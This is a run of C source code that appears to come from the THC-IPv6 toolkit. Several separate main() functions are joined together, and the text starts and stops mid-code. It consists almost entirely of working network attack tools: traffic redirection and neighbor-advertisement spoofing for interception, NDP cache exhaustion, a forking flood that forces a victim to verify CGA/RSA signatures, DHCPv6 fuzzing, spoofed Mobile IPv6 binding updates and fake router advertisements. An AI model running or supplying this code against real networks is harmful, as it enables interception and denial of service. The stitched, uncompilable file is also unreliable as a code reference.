547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0) printf("!"); signal(SIGALRM, clean_exit); alarm(3); // i = thc_send_pkt(interface, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); while (1) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } return 0; // never reached }
int main(int argc, char *argv[]) { int rawmode = 0, offset = 14; char string[256] = "ip6"; if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; if ((src6 = thc_resolve6(argv[2])) == NULL) { if (strcmp(argv[2], "*") != 0) { fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]); exit(-1); } } if ((dest6 = thc_resolve6(argv[3])) == NULL) { if (strcmp(argv[3], "*") != 0) { fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]); exit(-1); } } if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) { fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]); exit(-1); } if (argc >= 6) { if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]); exit(-1); } } else newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } mac6 = mac; if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); realownmac = thc_get_own_mac(interface); if (src6 != NULL) { strcat(string, " and src "); strcat(string, thc_ipv62notation(src6)); } if (dest6 != NULL) { strcat(string, " and dst "); strcat(string, thc_ipv62notation(dest6)); } printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n"); return thc_pcap_function(interface, string, (char *) intercept, 1, NULL); }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // defines mac as 6 pieces and defines pkt as null. char wdatabuf[1024]; //builds data buffer and sets memory size at 1024mb unsigned char *mac6 = mac, *src, *dst; //creates mac6 address usuing int i, s, len, pkt_len = 0, dlen = 0; int do_all = 1, use_real_mac = 1, use_real_link = 1; int state; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); //Parse options while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) { switch (i) { case '1': do_type = DO_SOL; break; case '2': do_type = DO_REQ; break; case '3': do_type = DO_CON; break; case '4': do_type = DO_REN; break; case '5': do_type = DO_REB; break; case '6': do_type = DO_REL; break; case '7': do_type = DO_DEC; break; case '8': do_type = DO_INF; break; case 'm': fuzz_msg_type = 1; break; case 'n': no_send = atoi(optarg); break; case 't': test_start = atoi(optarg); break; case 'e': test_end = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'F': use_real_link = 0; // no break case 'f': use_real_mac = 0; break; case 'p': ping = atoi(optarg); break; case 'd': do_dns = 1; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } //Check options if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (test_end < test_start) { printf("don't f**k up the command line options!\n"); exit(-1); } memset(mac, 0, sizeof(mac)); interface = argv[optind]; dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) { mac6 = thc_get_own_mac(interface); memcpy(mac, mac6, sizeof(mac)); } dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } //Establish state if (do_type == DO_SOL || do_type == DO_REB) state = STATELESS; else state = STATEFULL; // generate full fuzz mask for stateless types and partial for statefull types strcpy(fuzzbuf, fuzztype_ether); strcat(fuzzbuf, fuzztype_ip6); strcat(fuzzbuf, fuzztype_udp); if (fuzz_msg_type) strcat(fuzzbuf, fuzztype_dhcp6); else strcat(fuzzbuf, fuzztype_dhcp6no); if (state == STATELESS) { strcat(fuzzbuf, fuzztype_elapsed_time); strcat(fuzzbuf, fuzztype_client_identifier); strcat(fuzzbuf, fuzztype_IA_NA); if (do_dns) strcat(fuzzbuf, fuzztype_FQDN); } /** Generate packet **/ len = sizeof(solicit); memcpy(wdatabuf, solicit, len); //Add dns option if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); dns_option_hdr_len += sizeof(dnsupdate1); //Append domain string prefix fuzz mask if (state == STATELESS) { //<-- Do fuzzbuffer later for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix strcat(fuzzbuf, "B"); } if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; dns_option_hdr_len += strlen(dns_name) + 1; //Append variable length domain string suffix fuzz mask if (state == STATELESS) { for (i = 0; i < strlen(dns_name) + 1; ++i) strcat(fuzzbuf, "B"); } } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); dns_option_hdr_len += sizeof(dnsupdate2); //Append option request (FQDN request) fuzz mask if (state == STATELESS){ strcat(fuzzbuf, fuzztype_option_request); } } //Set message type if (state == STATELESS) { switch (do_type) { case DO_SOL: wdatabuf[0] = 0x01; break; case DO_REB: wdatabuf[0] = 0x06; break; default: break; } } //random src mac if (!use_real_link) for (i = 0; i < 8; i++) src[i + 8] = rand() % 256; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; if (!use_real_mac) { mac[i * 2] = rand() % 256; mac[i * 2 + 1] = rand() % 256; } if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } memcpy(wdatabuf + 22, mac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; //Fuzz solicit packet if (state == STATELESS) { if (fuzz_loop(pkt, &pkt_len) < 0) return -1; } //Fuzz request, confirm or renew paket else if (state == STATEFULL) { //Send a dhcp solicit to discover dhcpv6 servers if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to send initial solicit packet\n"); return -1; } usleep(75); //<-- I don't really know why this is neccessary but it seems to be //Construct and fuzz packets using server identifier got_packet = 0; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout) { while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function if (got_packet) break; } if (!got_packet) fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n"); } pkt = thc_destroy_packet(pkt); // printf("fuzzbuf: %s\n", fuzzbuf); return 0; }
int main(int argc, char *argv[]) { char *interface; int prefer = PREFER_GLOBAL; unsigned char *srcmac; unsigned char *dst6, *src6; unsigned char *ptr; //char dstmac[6] = ""; unsigned char *dstmac = NULL, *tmpmac, *dstnet; int pkt_len = 16; int count = 0; int i; int size, numbytes, samenet = 0; unsigned char *pkt = NULL; unsigned char buf[] = "NDP Exhaustion"; // hardcoded mac /*dstmac[0] = 0x00; dstmac[1] = 0x05; dstmac[2] = 0x73; dstmac[3] = 0xa0; dstmac[4] = 0x00; dstmac[5] = 0x01; */ setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if ((srcmac = thc_get_own_mac(interface)) == NULL) { printf("Error: invalid interface defined: %s\n", interface); exit(-1); } dstnet = argv[2]; // hier stehts dstnet drin if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); // prefix lenght // printf("Prefix length is %d\n", size); if (size != 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); numbytes = (128 - size) / 8; // number of bytes to create // printf("Creating %d random adress bytes\n", numbytes); srand(time(NULL) + getpid()); // initalize random number generator dst6 = thc_resolve6(dstnet); // thc_dump_data(dst6, 16, "dst"); if (argc >= 4) src6 = thc_resolve6(argv[3]); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); // thc_dump_data(src6, 16, "src"); dstmac = thc_get_mac(interface, src6, dst6); printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface); while (1) { ++count; for (i = 0; i < numbytes; i++) { dst6[16 - numbytes + i] = rand() % 256; // direct destination manipulation } if (count == 1) { tmpmac = thc_get_mac(interface, src6, dst6); if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0) samenet = 1; } else { if (samenet == 0) { free(dstmac); dstmac = thc_get_mac(interface, src6, dst6); } } // printf("%s\n", ip6adr); // printf("Sending ICMP ECHO to %s\n", ip6adr); if ((pkt = thc_create_ipv6(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL) errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n"); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1) errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n"); //thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf)); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) printf("!"); thc_destroy_packet(pkt); usleep(1); if (count % 100 == 0) printf("."); } }
int main(int argc, char *argv[]) { char dummy[24], mac[16] = "", buf2[6], buf3[1398]; unsigned char *ownmac = mac; int i, j; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); while ((i = getopt(argc, argv, "FHDRl")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': do_reverse = 1; break; case 'l': do_loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); interface = argv[optind]; if (argc - optind == 2 && argv[optind + 1] != NULL) sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else ownmac = thc_get_own_mac(interface); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); memset(buf2, 0, sizeof(buf2)); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); for (i = 0; i <= 0 + do_reverse; i++) { // printf("i: %d\n", i); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { ptype = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (ptype == NXT_ICMP6) ptype = NXT_FRAG; for (j = 0; j < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (ptype == NXT_ICMP6) ptype = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } // printf("i: %d, do_reverse: %d\n", i, do_reverse); if (i == 0 && do_reverse) { // printf("ipv62->ipv6 %p\n", ipv6); ipv62 = ipv6; ipv62->pkt[0] = 0x33; // multicast mac hack for destination ipv62->pkt[1] = 0x33; // multicast mac hack for destination ipv6 = NULL; pkt2 = pkt; pkt = NULL; pkt2_len = pkt_len; pkt_len = 0; ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only } } signal(SIGTERM, kill_children); signal(SIGSEGV, kill_children); signal(SIGHUP, kill_children); signal(SIGINT, kill_children); memset((char*)pp, 0, sizeof(pp)); printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n"); printf(" => echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n"); printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); }
/* main function */ int main(int argc, char **argv) { thc_cga_hdr *cga_opt; /* CGA header */ thc_key_t *key; /* public key */ unsigned char *pkt = NULL; /* generic packet space */ unsigned char *dst6, *cga, *dev; /* IPv6 addrs */ /* various parts of packets, temporaries */ char advdummy[16], soldummy[24], prefix[8], *addr; /* MAC addresses for testing, attacking */ // unsigned char dsthw[] = "\xff\xff\xff\xff\xff\xff"; // unsigned char tgthw[] = "\x00\x1a\xa0\x41\xf0\x2d"; /*real attack mac */ unsigned char *tgthw; // unsigned char srchw[] = "\xdd\xde\xad\xbe\xef\xdd"; // unsigned char srchwreal[] = "\x00\x11\x11\x32\xb2\x84"; // unsigned char tag[] = "\xdd\xde\xad\xbe\xef\xdd\xdd\xde\xad\xbe\xef\xdd\xbe\xef\xaa\xaa"; int pkt_len = 0; /* packet length */ int flags = 0; /* ICMPv6 flags */ // thc_ipv6_rawmode(0); /* generate my own MAC addresses */ int debug = 0; /* debug switch */ FILE *fp; /* file pointer for reading from /dev/urandom */ unsigned char test[6]; /* randomized mac storage */ int result = 0, pid, status, i; /* exit codes */ int count = 1000000000; if (argc != 5) { printf("original sendpees by willdamn <*****@*****.**>\n"); printf("modified sendpeesMP by Marcin Pohl <*****@*****.**>\nCode based on thc-ipv6\n\n"); printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]); printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n"); printf("Example: %s eth0 2048 fe80:: fe80::1\n\n", argv[0]); exit(1); } memset(&test, 0, 6); /* set 6 bytes to zero */ fp = fopen("/dev/urandom", "r"); /* set FP to /dev/urandom */ dev = argv[1]; /* read interface from commandline */ if ((addr = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]); exit(-1); } if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", dev); exit(-1); } memcpy(prefix, addr, 8); /* first 8 bytes of sockaddr is prefix */ key = thc_generate_key(atoi(argv[2])); /* EXPENSIVE KEYGEN HERE! */ if (key == NULL) { printf("Couldn't generate key!"); exit(1); } /*makes options and the address*/ cga_opt = thc_generate_cga(prefix, key, &cga); /* cga = thc_resolve6("::"); */ if (cga_opt == NULL) { printf("Error during CGA generation"); exit(1); } /* ICMP6 TARGET, IPDST */ if (argv[4] == NULL) dst6 = thc_resolve6("ff02::1"); else dst6 = thc_resolve6(argv[4]); tgthw = thc_get_mac(dev, cga, dst6); test[0] = 0; /* set MAC to intel */ test[1] = 170; /* set MAC to intel */ test[2] = 0; /* set MAC to intel */ /* set ICMP OPTION SLLA HERE */ memset(advdummy, 'D', sizeof(advdummy)); memset(soldummy, 'D', sizeof(soldummy)); /* set destination IP here */ memcpy(advdummy, dst6, 16); /*dstIP */ memcpy(soldummy, dst6, 16); /*dstIP */ /* fixed values for NS */ soldummy[16] = 1; soldummy[17] = 1; memcpy(&soldummy[18], test, 6); /* SLLA OPTION */ /* ND flags */ flags = ICMP6_NEIGHBORADV_OVERRIDE; /* the forking starts here */ for (i = 0; i < THREAD_NUM; ++i) { pid = fork(); if (pid == 0) { printf("Creating thread %d\n", i); /*randomize MAC here*/ result = fread((char *) &test[3], 1, 3, fp); /* create IPv6 portion */ if ((pkt = thc_create_ipv6_extended(dev, PREFER_LINK, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) { printf("Cannot create IPv6 header\n"); exit(1); } /* create ICMPv6 with SeND options */ if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0x0, flags, soldummy, 24, cga_opt, key, NULL, 0) < 0) { printf("Cannot add SEND options\n"); exit(1); } free(cga_opt); if (debug) { printf("%02x:%02x:%02x:%02x:%02x:%02x\n", test[0], test[1], test[2], test[3], test[4], test[5]); // printf("%02x:%02x:%02x:%02x:%02x:%02x\n", dsthw[0], dsthw[1], dsthw[2], dsthw[3], dsthw[4], dsthw[5]); fflush(stdout); } /* attach the IPv6+ICMPv6+SeND to an Ethernet frame with random MAC */ if ((result = thc_generate_pkt(dev, test, tgthw, pkt, &pkt_len)) < 0) { fprintf(stderr, "Couldn't generate IPv6 packet, error num %d !\n", result); exit(1); } printf("Sending %d...", i); fflush(stdout); while (count) { /* send many packets */ thc_send_pkt(dev, pkt, &pkt_len); --count; } exit(1); } } wait(&status); return 0; }
int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[24], buf2[6], buf3[1500]; unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14; char *interface; int rawmode = 0; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "DFHr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (argc - optind >= 3 && argv[optind + 2] != NULL) dst6 = thc_resolve6(argv[optind + 2]); else dst6 = thc_resolve6("ff02::1"); if (dst6 == NULL) { fprintf(stderr, "Error: could not resolve destination of solicitate: %s\n", argv[optind + 2]); exit(-1); } if (rawmode == 0) { if (argc - optind >= 4 && argv[optind + 3] != NULL) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); } if (argc - optind >= 5 && argv[optind + 4] != NULL) src6 = thc_resolve6(argv[optind + 4]); else src6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (mac == NULL || src6 == NULL) { fprintf(stderr, "Error: invalid interface %s or invalid mac/ip defined\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); memcpy(buf, unicast6, 16); buf[16] = 1; buf[17] = 1; memcpy(&buf[18], mac, 6); flags = 0; // ICMP6_NEIGHBORADV_OVERRIDE; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORSOL, 0, flags, (unsigned char *) &buf, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting solicitation of %s (Press Control-C to end)\n", argv[optind + 1]); while (1) { if (do_dst) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt1, &pkt1_len); } sleep(5); } return 0; }
int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL; unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL; int pkt1_len = 0, rawmode = 0; unsigned int id = 2, i; char *interface; thc_ipv6_hdr *hdr; if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; h = thc_resolve6(argv[2]); ha = thc_resolve6(argv[3]); coa = thc_resolve6(argv[4]); if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } for (i = 0; i < 4; i++) { memset(buf, 0, sizeof(buf)); buf[0] = 1; buf[1] = 2; buf[4] = 201; buf[5] = 16; memcpy(&buf[6], h, 16); buf_len = 22; if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL) return -1; hdr = (thc_ipv6_hdr *) pkt1; hdr->original_src = h; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 59; buf[1] = 3; buf[2] = 5; buf[3] = 0; buf[6] = (id % 65536) / 256; buf[7] = id % 256; buf[8] = 192; buf[10] = 0xff; buf[11] = 0xff; buf[12] = 1; buf[14] = 3; buf[15] = 16; memcpy(&buf[16], coa, 16); buf_len = 32; if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0) return -1; thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len); id += 16384; } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[16] = "", dmac[16] = ""; unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1]; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0; unsigned char *pkt = NULL, *searchlist = NULL; int pkt_len = 0; pcap_t *p; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); memset(rbuf, 0, sizeof(rbuf)); memset(mac, 0, sizeof(mac)); while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) { switch (i) { case 'i': interval = atoi(optarg); break; case 'm': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); dstmac = dmac; break; case 'S': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); mac6 = mac; break; case 's': if ((ip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg); exit(-1); } break; case 'M': mtu = atoi(optarg); if (mtu < 0 || mtu > 65535) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu); break; case 'n': to_send = atoi(optarg); if (to_send < 1 || mtu > 255) { fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg); exit(-1); } break; case 'A': if (pcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (size != 64) fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size); if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg); exit(-1); } pbuf[pcnt][0] = size % 256; memcpy((char *) &pbuf[pcnt][1], routerip6, 16); pcnt++; break; case 'a': plife = atoi(optarg); break; case 'r': rlife = atoi(optarg); break; case 'd': dlife = atoi(optarg); break; case 'l': llife = atoi(optarg); break; case 'T': reach = atoi(optarg); break; case 't': trans = atoi(optarg); break; case 'p': if (strncasecmp(optarg, "low", 3) == 0) prio = 0; else if (strncasecmp(optarg, "med", 3) == 0) prio = 1; else if (strncasecmp(optarg, "hi", 2) == 0) prio = 2; else if (strncasecmp(optarg, "res", 3) == 0) prio = 3; else { fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg); exit(-1); } break; case 'R': if (rcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, 